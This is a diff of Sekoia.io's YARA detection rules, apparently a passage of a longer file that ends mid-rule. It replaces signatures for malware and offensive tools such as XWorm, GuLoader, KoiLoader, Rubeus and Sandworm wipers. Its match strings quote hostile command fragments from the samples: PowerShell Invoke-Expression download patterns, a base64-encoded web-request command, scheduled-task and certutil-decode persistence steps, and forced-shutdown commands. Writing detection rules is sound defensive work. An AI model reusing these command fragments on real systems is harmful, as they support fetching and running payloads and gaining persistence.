+rule SEKOIA_Tool_Sharpefspotato_Strings : FILE
 {
 	meta:
-		description = "Detect the Sandman backdoor based on strings"
+		description = "Detects SharpEfsPotato based on strings"
 		author = "Sekoia.io"
-		id = "7bac7a1e-7d4a-4410-9ad4-1c85beb6faaf"
-		date = "2022-08-23"
+		id = "4286c72b-c0b9-4d2c-9847-68fc39ed4894"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_sandman_strings.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_sharpefspotato_strings.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "74ee1b73532d9050d5ed7ea0bed158322288a2f5b65255804ebf10dc1a4ea55b"
+		logic_hash = "4987b0d728472186a255adc1fba2d72288dd1f2b368212afd08ea8d7ff18e992"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259418,92 +259533,85 @@ rule SEKOIA_Backdoor_Sandman_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "e9f7c24c-879d-49f2-b9bf-2477dc28e2ee"
-		$s2 = "System.Net.Sockets"
-		$s3 = "ntpServer"
-		$s4 = "payloadUrl"
-		$s5 = "keepRunning"
-		$s6 = "payloadSize"
-		$s7 = "defaultNtpMessageSize"
-		$s8 = "InjectShellcode"
+		$ = "Program to launch (default cmd.exe)" wide
+		$ = "[!] Cannot perform interception, necessary privileges missing." wide
+		$ = "[!] Failed to created impersonated process with token:" wide
+		$ = "No authenticated interception took place, exploit failed"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 7 of them or $s1
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Tool_Nping_Strings : FILE
+
+rule SEKOIA_Merlin_Linux_Elf : FILE
 {
 	meta:
-		description = "Detects NPing"
+		description = "Detects Merling agent (ELF)"
 		author = "Sekoia.io"
-		id = "fcfd9539-b224-45b4-9252-0b4d56a40be4"
-		date = "2022-08-11"
+		id = "d9c57f5e-26c3-43be-b2cf-10f5129d3be6"
+		date = "2022-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_nping_strings.yar#L1-L20"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/merlin_linux_elf.yar#L4-L34"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0c7216438e9c974d889e4ccc8cdb99ab18d1dc403820d60914b80ff9bc4528fa"
-		score = 75
+		logic_hash = "f7edd517a575b54c9ee8acdc7a5ebac7c0c9eb286abc49e2962b02aad40e5973"
+		score = 40
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "http://nmap.org/nping"
-		$ = "nping scanme.nmap.org"
-		$ = "Bogus target structure passed to %s"
-		$ = "Packet too short."
-		$ = "read_arp_reply_pcap"
+		$s1 = "github.com/Ne0nd0g/merlin" ascii
+		$s2 = "github.com/refraction-networking" ascii
+		$s3 = "SendMerlinMessage" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them and filesize < 1MB
+		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "80199718ff1821a3fe914cd2279ab3a0" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and all of them and filesize < 15MB
 }
-rule SEKOIA_Backdoor_Win_Rokrat : FILE
+
+rule SEKOIA_Launcher_Win_Mistcloak : FILE
 {
 	meta:
-		description = "Detect the RokRAT malware"
+		description = "Detect the MISTCLOAK malware"
 		author = "Sekoia.io"
-		id = "97a3acc1-4120-4d67-a6ad-fa204f2fd7f5"
-		date = "2023-07-11"
+		id = "3dbf5efa-d77c-436a-a080-9ac58a78425f"
+		date = "2022-12-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_win_rokrat.yar#L1-L31"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/launcher_win_mistcloak.yar#L4-L33"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "42e0b8583570d32a5d6a5bed175a53951e7d68d8471a283ef245686621dc01c4"
+		logic_hash = "fc2731ec4e2917be1ad169908ed324931a93f6998aee606319750b5cc02715e2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "84760cac26513915ebfb0a80ad3ddabe62f03ec4fda227d63e764f9c4a118c4e"
-		hash2 = "758348521331bb18241d1cfc90d7e687dbc5bad8d596a2b2d6a9deb6cfc8cb1d"
-		hash3 = "2a253c2aa1db3f809c86f410e4bd21f680b7235d951567f24d614d8e4d041576"
-		hash4 = "ebce34cdeb20bc8c75249ce87a3080054f48b03ef66572fbc9dc40e6c36310d6"
-		hash5 = "a1e4e95a20120f16adacb342672eec1e73bd7826b332096f046bb7e2b7cd80a1"
-		hash6 = "3be58a7a7a25dbceee9e7ef06ef20aa86aef083be19db9e5ffb181d3f9f6615a"
-		hash7 = "fa4df84071b9ae20b321e4d22162d8480f6992206bc046e403c2fbedd1655503"
-		hash8 = "aa76b4db29cf929b4b22457ccb8cd77308191f091cde2f69e578ade9708d7949"
 
 	strings:
-		$ = "--wwjaughalvncjwiajs--"
-		$ = {7b 00 22 00 70 00 61 00 74 00 68 00 22 00 3a 00 22 00 25 00 73 00 22 00 2c 00 22 00 6d 00 6f 00 64 00 65 00 22 00 3a 00 7b 00 22 00 2e 00 74 00 61 00 67 00 22 00 3a 00 22 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 22 00 7d 00 7d}
-		$ = {68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 6c 00 6f 00 75 00 64 00 2d 00 61 00 70 00 69 00 2e 00 79 00 61 00 6e 00 64 00 65 00 78 00 2e 00 6e 00 65 00 74 00 2f 00 76 00 31 00 2f 00 64 00 69 00 73 00 6b 00 2f 00 72 00 65 00 73 00 6f 00 75 00 72 00 63 00 65 00 73 00 2f 00 75 00 70 00 6c 00 6f 00 61 00 64 00 3f 00 70 00 61 00 74 00 68 00 3d 00 25 00 73 00 26 00 6f 00 76 00 65 00 72 00 77 00 72 00 69 00 74 00 65 00 3d 00 25 00 73}
+		$ = "\\usb.ini"
+		$ = "autorun.inf\\Protection for Autorun\\System Volume Information"
+		$ = "G:\\project\\APT\\U"
+		$ = "\\new\\u2ec\\Release\\u2ec.pdb"
+		$ = "CheckUsbService"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of them
+		uint16( 0 ) == 0x5A4D and 3 of them or hash.md5 ( pe.rich_signature.clear_data ) == "0f5082fd7ddd1950fa332a8fa4df052f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "0ceac625db1e8405efe45d47486e9e2d" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6968e6ac7b9c1dfbf40a0b3c4f6f4157" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e6ed2da41f74e948cba7a002c41c6af5" )
 }
-rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
+rule SEKOIA_Rat_Win_Xworm_V3 : FILE
 {
 	meta:
-		description = "Detects the QNAPWorm loader"
+		description = "Finds XWorm (version XClient, v3) samples based on characteristic strings"
 		author = "Sekoia.io"
-		id = "c6e87a55-73ea-4df4-ab61-b5d34968d741"
-		date = "2022-05-23"
+		id = "5fb1cbd3-1e37-43b9-9606-86d896f2150b"
+		date = "2023-03-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_qnapworm_loader_may2022.yar#L1-L28"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/rat_win_xworm_v3.yar#L1-L30"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "d31fdaaacd417a4191e79e3a287e84c55109158eaacc789b2129e2ba94e443f6"
+		hash = "0016647c3c7031e744c0af6f9eadb73ab5cab1ca4f8ce7633f4aa069b62755cd"
+		hash = "07e747a9313732d2dcf7609b6a09ac58d38f5643299440b827ec55f260e33c12"
+		hash = "de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147"
+		logic_hash = "9a50f41f6c295f48597f6db3f5d9141345b3711ef110a0f925c881f3a75580ca"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259511,64 +259619,62 @@ rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = {
-        66 C1 C0 05
-        0F B7 D8
-        81 C3 85 D0 FF FF
-        66 C1 C3 02
-        0F B7 C3
-        0F B6 9A ?? ?? ?? ??
-        33 D8
-        88 1C 11
-        42
-        0F B6 D2
-        81 FA ?? 00 00 00
-        }
+		$str01 = "$VB$Local_Port" ascii
+		$str02 = "$VB$Local_Host" ascii
+		$str03 = "get_Jpeg" ascii
+		$str04 = "get_ServicePack" ascii
+		$str05 = "Select * from AntivirusProduct" wide
+		$str06 = "PCRestart" wide
+		$str07 = "shutdown.exe /f /r /t 0" wide
+		$str08 = "StopReport" wide
+		$str09 = "StopDDos" wide
+		$str10 = "sendPlugin" wide
+		$str11 = "OfflineKeylogger Not Enabled" wide
+		$str12 = "-ExecutionPolicy Bypass -File \"" wide
+		$str13 = "Content-length: 5235" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of ( $s* )
+		uint16( 0 ) == 0x5A4D and 8 of them
 }
-rule SEKOIA_Apt_Gamaredon_Vbs_Downloader : FILE
+rule SEKOIA_Guloader_Vbscript : FILE
 {
 	meta:
-		description = "Detects small VBS loader"
+		description = "visual basic script delivering GuLoader"
 		author = "Sekoia.io"
-		id = "13b63570-2f18-4b35-8087-9ab15c58a0d1"
-		date = "2023-02-08"
+		id = "3472e403-b1e6-4fdf-9770-af42d505b556"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_vbs_downloader.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/guloader_vbscript.yar#L1-L17"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "e3ae516ea18f2912b7f0fb7864542ae609167fb29751b87cbf6f9cd34ec858ba"
+		logic_hash = "d0398b19ec57cff8afd52b06dc9da18788b1eefdf6be70650138e9b342d91d24"
 		score = 75
-		quality = 68
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "on error resume next" nocase ascii wide
-		$s2 = "String('http" nocase ascii wide
-		$s3 = "send()" nocase ascii wide
-		$s4 = ")|Invoke-Expression" nocase ascii wide
-		$s5 = "'); Invoke-Expression $" nocase ascii wide
-		$s6 = "');Invoke-Expression $" nocase ascii wide
+		$s1 = " = CreateObject(\"WScript.Shell\")"
+		$s2 = " = Join("
+		$s3 = ",vbnullstring)"
 
 	condition:
-		$s1 and ( $s2 or $s3 ) and ( $s4 or $s5 or $s6 ) and filesize < 1KB
+		filesize < 20KB and all of them and #s1 > 1 and @s3- @s2 < 16
 }
-rule SEKOIA_Malware_Valleyrat_1Ststage_Strings : FILE
+rule SEKOIA_Tool_Swor : FILE
 {
 	meta:
-		description = "Detects ValleyRat 1stage"
+		description = "Detects swor"
 		author = "Sekoia.io"
-		id = "6628ba47-37ad-4bdb-bbc0-7286d777000e"
-		date = "2024-06-11"
+		id = "75ce2ed7-2972-4e04-98dc-451acf80c842"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/malware_valleyrat_1ststage_strings.yar#L1-L21"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_swor.yar#L1-L24"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "78c45b8bd9241646512483d179d48b0e42e97fa1c18d6afd1af4423f7b7ce3c6"
+		hash = "d3f92b3349109fc6de26f5e40800fec15308c27fa4fe81fe42af5030637a3a63"
+		logic_hash = "bcd1c0afece740b82b606aad8bdebcc88b72ae61df6513318215a217021efab4"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259576,27 +259682,27 @@ rule SEKOIA_Malware_Valleyrat_1Ststage_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%016llX.DLL" wide
-		$ = "%s\\%s" wide
-		$ = "%016llX\\%s" wide
-		$ = "connection already in progress"
-		$ = "SleepConditionVariableSRW"
+		$old_sword_s1 = "Failed to open payload file: "
+		$old_sword_s2 = "Failed to open config file: "
+		$sword_s1 = "open encrypted file error: "
+		$sword_s2 = "open config file error: "
+		$enum_calendar = "EnumCalendarInfo"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 4MB and all of them
+		uint16be( 0 ) == 0x4d5a and $enum_calendar and ( 2 of ( $old_sword_s* ) or 2 of ( $sword_s* ) ) and filesize < 1MB and true
 }
-rule SEKOIA_Hacktool_Defendercontrol_Strings : FILE
+rule SEKOIA_Tool_Cheat_Engine : FILE
 {
 	meta:
-		description = "Detects DefenderControl based on strings"
+		description = "Detects Cheat Engine driver"
 		author = "Sekoia.io"
-		id = "c6587a46-5f9b-4bf0-9231-9d2505293557"
-		date = "2022-03-08"
+		id = "51d4246c-f7a1-4589-8f97-bd85d1fe4a0e"
+		date = "2024-07-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/hacktool_defendercontrol_strings.yar#L1-L19"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_cheat_engine.yar#L1-L22"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "8372ab6f922471c28b528d908527f52d393cf6e6308d6acad882d6d5862df43c"
+		logic_hash = "2a70016be13c4eff7f7381fd0e34c345c95f09d4cd8b754ea68d59adfe3fe4b6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259604,33 +259710,30 @@ rule SEKOIA_Hacktool_Defendercontrol_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "www.sordum.org All Rights Reserved." wide
-		$ = "dControl.exe" wide
-		$ = "By BlueLife" wide
+		$s1 = "ObOpenObjectByName" wide
+		$s2 = "PsGetProcessImageFileName" wide
+		$s3 = "PsRemoveCreateThreadNotifyRoutine" wide
+		$s4 = "PsSuspendProcess" wide
+		$s5 = "PsResumeProcess" wide
+		$s6 = "\\device\\physicalmemory" wide
+		$log = "%sCPU%d.trace" wide
+		$ioctl_code = {04 E1 22 00}
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 600KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 200KB and all of them
 }
-rule SEKOIA_Downloader_Win_Cobianrat : FILE
+rule SEKOIA_Koiloader_Lnk : FILE
 {
 	meta:
-		description = "Detect CobianRAT downloader"
+		description = "LNK file leading to deploy KoiLoader"
 		author = "Sekoia.io"
-		id = "7a86c17f-bf4e-4465-9488-244b75fc36f1"
-		date = "2024-08-23"
+		id = "e82975b9-94b7-4de8-8cd5-d594aa80cf02"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/downloader_win_cobianrat.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/koiloader_lnk.yar#L1-L18"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "7a70779d9d7de5e370fac0fa2d4ccd13"
-		hash = "2ce40599a4990680db3af5defcd5381a"
-		hash = "56515c48f82475e7bb6a26b027a459d7"
-		hash = "3450bece12bd8103d5e718a2661d0404"
-		hash = "132858739129d2b863dc547facbed7e9"
-		hash = "693bd96d162c54d7e9605580eaf54a6e"
-		hash = "d03a4988e22e6c7b2a03efa2bdb1502d"
-		hash = "ab8c68b907ec2ce316bf18f00938710c"
-		logic_hash = "6437a2d0854fb7bd9ddde8434e9a2b95cbb7ccc04381400db211f38a6a575e43"
+		logic_hash = "49953c76796f671ed80afa21872aac500d706f2af4426a5ec2854e16b9d0e474"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259638,114 +259741,111 @@ rule SEKOIA_Downloader_Win_Cobianrat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = {24 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 55 00 72 00 6C 00 20 00 3D 00 20 00 27}
+		$s1 = "bat & schtasks /create" wide
+		$s2 = "/sc minute /mo 1" wide
+		$s3 = "c3RhcnQgL21pbiBwb3dlcnNoZWxsIC1jb21tYW5kICJJV1IgLVVzZUJhc2ljUGFyc2luZyAnaHR0cHM6" wide
+		$s4 = " & certutil -f -decode " wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint32( 0 ) == 0x0000004c and all of them
 }
-rule SEKOIA_Tool_Soaphound_Strings : FILE
+rule SEKOIA_Backdoor_Lin_Bifrost : FILE
 {
 	meta:
-		description = "Detects SOAPHound based on strings"
+		description = "Detect the Bifrost backdor based on strings"
 		author = "Sekoia.io"
-		id = "adf48506-f07d-445a-83cc-0aed3b6b55eb"
-		date = "2024-11-12"
+		id = "9726b5f5-8cc3-4fad-950b-f20cac04d496"
+		date = "2024-03-05"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_soaphound_strings.yar#L1-L21"
+		reference = "https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/backdoor_lin_bifrost.yar#L1-L20"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "b2a953590d75213388473fb51e6b5f2f"
-		logic_hash = "14ff92230d0999a39a6e1042f5c42b5ae275d90ece3d74727e5da44c569a93eb"
+		logic_hash = "a3fd671c02c29f67cf5b8d2d0e857336da72f989688f2db19cd028398080c5e2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "8e85cb6f2215999dc6823ea3982ff4376c2cbea53286e95ed00250a4a2fe4729"
+		hash2 = "2aeb70f72e87a1957e3bc478e1982fe608429cad4580737abe58f6d78a626c05"
+		hash3 = "f2bef6bed27f4b527118dd62b4035003c14afaffa72729c8117f213623f644ec"
 
 	strings:
-		$ = "Output files generated in" wide
-		$ = "(&(cn=*)(!(cn=a*))(!(cn=b*))" wide
-		$ = "unicodePassword" wide
-		$ = "net.tcp://localhost:9389/ActiveDirectoryWebServices/" wide
+		$ = "%c2%s%c3%u%c4%u-%.2u-%.2u %.2u:%.2u"
+		$ = "%c1%s%c3D%c4%u-%.2u-%.2u %.2u:%.2u"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 2MB and all of them
+		uint32be( 0 ) == 0x7f454c46 and all of them
 }
-rule SEKOIA_Observerstealer : FILE
+rule SEKOIA_Apt_Kimsuky_Vbs : FILE
 {
 	meta:
-		description = "detection based on the strings"
+		description = "VBS files used by Kimsuky"
 		author = "Sekoia.io"
-		id = "52314870-c100-441d-9ccf-07588325a401"
-		date = "2024-02-01"
+		id = "3f92dbda-2ddb-4fa3-a587-743f65ced9e4"
+		date = "2024-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/observerstealer.yar#L1-L22"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_kimsuky_vbs.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "690bd5a16e780884641a66f06256a4147c092788f155644a8589d38b70dc4acc"
+		hash = "12386be22ca82fce98a83a5a19e632bc"
+		hash = "7b5783d42240651af78ebf7e01b31fe8"
+		hash = "ff7d68e5fb253664ce64c85457b28041"
+		hash = "622358469e5e24114dd0eb03da815576"
+		hash = "edbb2aa40408e2a7936067ace38b445b"
+		hash = "73ed9b012785dc3b3ee33aa52700cfe4"
+		logic_hash = "b4a05a50c8223198082f6f6aa7309cc19b019738fb99e37c6f2140b8ef7cecc9"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "URLOpenBlockingStreamW" ascii
-		$s2 = "processGrabber" wide
-		$s3 = "grabbers" wide
-		$s4 = {2F 00 73}
-		$s5 = "UNKNOWN_HWID" ascii
-		$s6 = {48 00 57 00 49 00 44}
+		$ = ")):Next:Execute " ascii
+		$ = "=\"\":" ascii
+		$ = "\":for "
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 400KB and all of them
+		all of them and filesize < 10KB
 }
-rule SEKOIA_Trojan_Android_Brata : FILE
+rule SEKOIA_Apt_Sandworm_Awfulshred_Obfuscation_Apr2022 : FILE
 {
 	meta:
-		description = "Detect samples of the Android banking trojan BRATA"
+		description = "Detects the AWFULSHRED wiper used by Sandworm"
 		author = "Sekoia.io"
-		id = "fde9b82e-c677-44ed-b512-b225a3aba201"
-		date = "2022-01-27"
+		id = "52317e6b-7f2c-4c2a-bcfc-ebb4ab4c728e"
+		date = "2022-04-12"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/trojan_android_brata.yar#L1-L29"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_awfulshred_obfuscation_apr2022.yar#L1-L16"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "0c94e5e0c01d4fa9bf28603787029938a3159f468dd3876e7d25646e93dd68b8"
+		logic_hash = "3e1eed3a4b638893828289f928a75b855bc9e1e29444ffa81c0461fdc1277cad"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$goo0 = "Google Play services error"
-		$goo1 = "Error de Serveis de Google Play"
-		$goo2 = "Fehler bei Zugriff auf Google Play-Dienste"
-		$goo3 = "Erro nos servizos de Google Play"
-		$goo4 = "Fout met Google Play-services"
-		$goo5 = "Virhe Google Play -palveluissa"
-		$goo6 = "Erro do Google Play Services"
-		$goo7 = "Error de Google Play Services"
-		$res0 = "res/xml/device_admin.xml"
-		$res1 = "res/xml/windowchangedetectingservice.xml"
-		$res2 = "res/xml-v22/windowchangedetectingservice.xml"
+	strings:
+		$h = "#!/bin/bash"
+		$s = { 64 65 63 6c 61 72 65 20 2d 72 20 [8] 3d }
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and filesize > 2MB and filesize < 6MB and 7 of ( $goo* ) and 2 of ( $res* )
+		$h at 0 and #s > 15
 }
-rule SEKOIA_Tool_Rubeus_Strings : FILE
+rule SEKOIA_Apt_Sandworm_Olympicdestroyer : FILE
 {
 	meta:
-		description = "Detects Rubeus"
+		description = "Detects OlympicDestroyer malware"
 		author = "Sekoia.io"
-		id = "df1860d0-ec34-4c2d-bd83-5f16b26d075c"
-		date = "2024-03-22"
+		id = "6820eb32-fea2-4a00-a5a2-672ba09f8206"
+		date = "2022-04-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/tool_rubeus_strings.yar#L1-L24"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_sandworm_olympicdestroyer.yar#L1-L21"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		logic_hash = "adc6a5207bb15c8020ca170564ea9066b2c0b0e09839d6838744c623f59153cf"
+		logic_hash = "a68a96ab036e69a32e173b2d2fa6a81ab872032f89bfdfc3cd4446305a33921b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -259753,95 +259853,85 @@ rule SEKOIA_Tool_Rubeus_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".Ndr.RPC_DISPATCH_TABLE32"
-		$ = ".Ndr.RPC_PROTSEQ_ENDPOINT32"
-		$ = ".Ndr.RPC_SERVER_INTERFACE32"
-		$ = ".Ndr.NDR_EXPR_DESC32"
-		$ = "$krb5tgs${0}$*{1}${2}${3}*${4}${5}" wide
-		$ = "$krb5asrep$23${0}@{1}:{2}" wide
-		$ = "Unable to decrypt the EncTicketPart using key:" wide
-		$ = "[*] Target service  : {0:x}" wide
+		$ = "cmd.exe /c (ping 0.0.0.0 > nul)" wide
+		$ = "if exist %programdata%\\evtchk.txt" wide
+		$ = "\\\\.\\pipe\\%ls" wide
+		$ = "%ProgramData%\\%COMPUTERNAME%.exe" wide
+		$ = "(exit 5) else ( type nul >" wide
+		$ = "Select * From Win32_ProcessStopTrace" nocase
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 5 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_2024 : FILE
+rule SEKOIA_Ransomware_Win_Honkai_Jan2023 : FILE
 {
 	meta:
-		description = "Detects HTML Smuggling webpages of Gamaredon used in 2024"
+		description = "Rule to detect Honkai ransomware samples."
 		author = "Sekoia.io"
-		id = "8fa1f80b-2261-4d63-92d8-7c360be73fe2"
-		date = "2024-09-09"
+		id = "6ef91cb5-e122-4f91-bc15-3813b8f91cbf"
+		date = "2023-02-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/apt_gamaredon_htmlsmuggling_2024.yar#L1-L23"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/yara_rules/ransomware_win_honkai_jan2023.yar#L1-L23"
 		license_url = "https://github.com/SEKOIA-IO/Community/blob/eb4a01ac59073178c241b45b6def27c8873569e3/LICENSE.md"
-		hash = "ab2807824e68d5efb4c896e1af82e693"
-		hash = "926b7e65d0d61cd6ba9e085193ae8b1d"
-		logic_hash = "9cd82f497fd7b82f02fec4ce1d131cd2685861c7c02aaae992e07a7d8bd30595"
